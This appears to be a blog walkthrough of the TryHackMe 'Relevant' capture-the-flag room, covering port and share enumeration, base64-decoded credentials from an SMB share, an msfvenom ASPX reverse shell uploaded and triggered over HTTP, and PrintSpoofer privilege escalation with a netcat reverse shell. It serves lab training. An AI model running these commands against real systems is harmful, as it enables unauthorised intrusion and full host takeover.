In the vast world of cybersecurity, sometimes, it’s the smallest of details that can lead to the biggest breakthroughs. It’s no surprise then, that in my recent foray into the ‘Relevant’ room on TryHackMe, I found myself engrossed in a painstaking process of meticulous enumeration. But isn’t that the very essence of hacking? Peeling back the layers, digging deep, and leveraging a myriad of tools until we strike gold. In this post, I’ll be guiding you through the winding paths I took, the tools I employed, and the methodologies I leaned on to unravel the mysteries of ‘Relevant’. Whether you’re a seasoned ethical hacker or just starting your journey, there’s something to learn and discover here. So, grab your virtual lock picks and let’s embark on this captivating journey together!

Enumeration
Nmap scan:
nmap -n -Pn -sT -sV -T4 -vv 10.10.102.149

Open ports:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

If we access the web server through the IP we will see the default IIS webpage:

Enumeration of hidden directories with “ffuf”:
sudo ffuf -w /usr/share/dirb/wordlists/common.txt -u http://10.10.11.204:80/FUZZ -v

But I didn’t see any new directory:
:: Method : GET
:: URL : http://10.10.102.149/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
[Status: 200, Size: 703, Words: 27, Lines: 32]
| URL | http://10.10.102.149/
* FUZZ:
:: Progress: [4614/4614] :: Job [1/1] :: 99 req/sec :: Duration: [0:01:43] :: Errors: 5 ::
Let’s enumerate the SMB service with enum4linux:
enum4linux -a 10.10.102.149
But without results:

Let’s try enumerate more ports with nmap:
nmap -n -sT -Pn -sV -T4 -p- -vv 10.10.102.149

And then we will see that we have more open ports:
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49663/tcp open http syn-ack Microsoft IIS httpd 10.0
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

In this point we will try enumerate vulnerabilities with Nmap:
nmap -n -sT -Pn -sV -T4 --script=vuln 10.10.67.204 -vv
We will see the machine is vulnerable to “ms17-010”:

Then we will keep doing enumeration. We will try to enumerate the more specifically with smbclient:
smbclient -L 10.10.67.204

We have discovered a shared folder. Now we will try to connect to this folder with smbclient:
smbclient '\10.10.67.204nt4wrksv'
We have detected a password file inside the shared folder:

The next step is download it:
get passwords.txt
Now we have an user and password encoded:

Let’s try brute force to discover the user and the password. I checked the first hash and it is look like a base64 hash:

The next step is try to decode the base64 hash and we will obtain a new user and password:
Bob:!P@$W0rD!123

The next hash also it is look like a base64 hash:

After try to decode it we will get another user and password:
Bill:Juw4nnaM4n420696969!$$

In this point we will enumerate other web server into the port ”49663”. We will try to detect hidden folders:
gobuster dir -u http://10.10.13.126:49663/ -w directory-list-2.3-medium.txt -s '200,301' -no-error
- -u: Objetive url.
- -w: dictionary.
- -s: Positive status codes. This option show us just the responses with the status code we have configured.
- -no-error: without errors.
- -t: Number of concurrent threads. Default 10.

Finally, we have found the same directory listening through the server on the port “49663”:

If we go through our web client we will see that we can check the files through our web client:

Initial Explotation
That means we can upload something into the share and execute it through our web client. To do that we will generate an asp reverse shell with msfvenom:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.233.9 LPORT=443 -f aspx > relevant.aspx

Let’s upload our shell with smbclient, but first we need to connect to the share:
smbclient '\10.10.7.182nt4wrksv'

Now we will upload our shell:

Once we have our shell into the server we will execute our listener with metasploit:
use exploit/multi/handler
show options
set LHOST 10.10.233.9
set LPORT 443
exploit -j

Then now we can execute our shell through our navigator:
http://10.10.7.182:49663/nt4wrksv/relevant.aspx

We will see our connection in our listener server:

Access to our shell:

Finally we will have access to the user flag.
Privilege Escalation
Now we don’t have “Administrator” privileges, so we will need to perform privilege escalation. First of all, we need to check who we are:
whoami

We are running our shell with a service user “iis apppool”. To still enumerating we will execute “winPEAS.exe” to try to detect ways to perform Privilege Escalation:

Then through our shell we will execute “winPEAS.bat”:

After execute winPEAS I have detected unusual token “SeImpersonatePrivilege”:

We can find information in hacktricks about how to perform privilege escalation through this token:

We will check which exploit works for our machine. In this case is “PrintSpoofer”. We can found it here. First of all we need to upload portable netcat to perform a reverse shell through SMB:

Also we need to upload the “PrintSpoofer” exploit:

Now we have to turn on our netcat listener server:
nc -lvp 4433

Let’s try to exploit the token with “PrintSpoofer”:
PrintSpoofer64.exe -c "c:inetpubwwwrootnt4wrksvnc.exe 10.10.233.9 4433 -e cmd"

Then we will receive our reverse shell with Administrator privileges:

We have access to the Administrator flag too.